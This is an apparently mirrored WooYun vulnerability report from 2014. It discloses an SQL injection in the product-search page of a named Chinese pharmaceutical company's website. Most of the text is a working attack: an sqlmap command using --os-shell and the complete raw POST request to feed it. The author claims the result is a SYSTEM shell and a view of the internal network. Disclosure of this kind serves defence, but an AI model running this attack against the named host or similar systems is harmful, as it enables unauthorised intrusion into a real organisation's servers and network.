乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-26: 细节已通知厂商并且等待厂商处理中 2014-12-01: 厂商已经主动忽略漏洞,细节向公众公开
内网尽在掌握,可惜不喜欢玩内网怎么破?
注射点在搜索功能:http://web.999.com.cn/sj/pro.aspx?tiao=1
sqlmap参数如下设置可获取system权限shell一枚,执行任意命令:
sqlmap.py -r 999.txt --os-shell
999.txt内容(请注意代码区换号符问题,复现时复制粘贴请保持http协议正确):
POST /sj/pro.aspx?tiao=1 HTTP/1.1Host: web.999.com.cnProxy-Connection: keep-aliveContent-Length: 3347Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://web.999.com.cnUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 UBrowser/3.1.1644.34 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://web.999.com.cn/sj/pro.aspx?tiao=1Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=vucq3piurlfvow45aifti1rb__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNDc3OTgyOTkwD2QWAmYPZBYCAgMPZBYGAgUPFgIeC18hSXRlbUNvdW50AgwWGGYPZBYCZg8VAhFwcm8uYXNweD9UeXBlaWQ9Ng%2FooaXnm4rosIPnkIboja9kAgEPZBYCZg8VAhFwcm8uYXNweD9UeXBlaWQ9OAnmipfnlJ%2FntKBkAgIPZBYCZg8VAhJwcm8uYXNweD9UeXBlaWQ9MTIP5Lit6I2v5rOo5bCE5YmCZAIDD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTIP5oSf5YaS5q2i5ZKz6I2vZAIED2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTMP6IKg6IOD5raI5YyW6I2vZAIFD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTQP56Wb6YKq5q2j5L2T6I2vZAIGD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTUP55qu6IKk5aSW55So6I2vZAIHD2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTcM5aaH56eR55So6I2vZAIID2QWAmYPFQIRcHJvLmFzcHg%2FVHlwZWlkPTkM5oqX6IK%2F55ik6I2vZAIJD2QWAmYPFQIScHJvLmFzcHg%2FVHlwZWlkPTEwDOmFjeaWuemil%2BeykmQCCg9kFgJmDxUCEnByby5hc3B4P1R5cGVpZD0xMQ%2FmuIXng63op6Pmr5Loja9kAgsPZBYCZg8VAhJwcm8uYXNweD9UeXBlaWQ9MTMG5YW25LuWZAIHD2QWCAIBD2QWBAIBDw8WAh4EVGV4dAUM6I2v5ZOB5pCc57SiZGQCAw8WAh8AZmQCAw8PFgIfAQUM6I2v5ZOB5pCc57SiZGQCBQ8WAh8AZmQCBw8PFgYeCFBhZ2VTaXplAgoeC1JlY29yZGNvdW50Zh4QQ3VycmVudFBhZ2VJbmRleAIBZGQCCQ8WAh8BBaELPGRpdiBjbGFzcz0ibGluazEiPjx1bD48bGk%2BPGEgaHJlZj0iaHR0cDovLzk5OWdtbC5jb20uY24vIiAgIHRhcmdldD0iX2JsYW5rIj45OTnmhJ%2FlhpLngbU8L2E%2BPC9saT48L3VsPjx1bD48bGk%2BPGEgaHJlZj0iaHR0cDovL3d3dy45OTlweXAuY29tLyIgICB0YXJnZXQ9Il9ibGFuayI%2B55qu6IKk6I2v5a625pePPC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuOTk5LmNvbS5jbiIgICB0YXJnZXQ9Il9ibGFuayI%2B5Y2O5ram5LiJ5Lmd5Yy76I2v6IKh5Lu95pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly85OTlwaGFybS5jb20uY24vcHJvLmFzcCIgICB0YXJnZXQ9Il9ibGFuayI%2B5rex5Zyz5LiJ5Lmd5Lit5Yy76I2v5oqV6LWE5Y%2BR5bGV5pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuMzl6eS5jb20iICAgdGFyZ2V0PSJfYmxhbmsiPua3seWcs%2BW4guS4ieS5neeOsOS7o%2BS4reiNr%2BaciemZkOWFrOWPuDwvYT48L2xpPjwvdWw%2BPHVsPjxsaT48YSBocmVmPSJodHRwOi8vd3d3Lmdvc3VuY2hpbmEuY29tIiAgIHRhcmdldD0iX2JsYW5rIj7mt7HlnLPkuZ3mlrDoja%2FkuJrmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjwvZGl2PjxkaXYgY2xhc3M9ImxpbmsxIj48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuYWhqYy5jbiIgICB0YXJnZXQ9Il9ibGFuayI%2B5a6J5b696YeR6J%2B%2B55Sf5YyW6IKh5Lu95pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cueWE5OTkuY29tLyIgICB0YXJnZXQ9Il9ibGFuayI%2B6ZuF5a6J5LiJ5Lmd6I2v5Lia5pyJ6ZmQ5YWs5Y%2B4PC9hPjwvbGk%2BPC91bD48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuOTk5YmouY29tIiAgIHRhcmdldD0iX2JsYW5rIj7ljJfkuqzkuInkuZ3oja%2FkuJrmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjx1bD48bGk%2BPGEgaHJlZj0iaHR0cDovL3d3dy45OTlqeC5jb20uY24iICAgdGFyZ2V0PSJfYmxhbmsiPuaxn%2Bilv%2BS4ieS5neiNr%2BS4muaciemZkOWFrOWPuDwvYT48L2xpPjwvdWw%2BPHVsPjxsaT48YSBocmVmPSJodHRwOi8vc2RzYW5qaXV5eS5iaXp0eC5jbi8iICAgdGFyZ2V0PSJfYmxhbmsiPuWxseS4nOS4ieS5neiNr%2BS4muaciemZkOWFrOWPuDwvYT48L2xpPjwvdWw%2BPHVsPjxsaT48YSBocmVmPSJodHRwOi8vd3d3Ljk5OW5rLmNuIiAgIHRhcmdldD0iX2JsYW5rIj7muZbljZfkuInkuZ3ljZflvIDliLboja%2FmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjwvZGl2PjxkaXYgY2xhc3M9ImxpbmsxIj48dWw%2BPGxpPjxhIGhyZWY9Imh0dHA6Ly93d3cuOTk5bmluZXN0YXIuY29tIiAgIHRhcmdldD0iX2JsYW5rIj7mt7HlnLPkuZ3mmJ%2FljbDliLfljIXoo4Xpm4blm6LmnInpmZDlhazlj7g8L2E%2BPC9saT48L3VsPjwvZGl2PmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFEmN0bDAwJEltYWdlQnV0dG9uMXMgz3N2dpdbmh6Fz3HjmyrXPj%2Fb&__EVENTVALIDATION=%2FwEWAwKMpsmMBgK33sGJAQLssvLQAxoyWrcK7rrKvmTSrKtmUzqiYq4L&ctl00%24TextBox1=%E4%B8%89%E4%B9%9D*&ctl00%24ImageButton1.x=19&ctl00%24ImageButton1.y=10
使用sqlmap需要注意的地方:
system shell:
内网信息:
都不用操心提权的事了。
应该懂。
危害等级:无影响厂商忽略
忽略时间:2014-12-01 09:58
2014-12-11:在跟进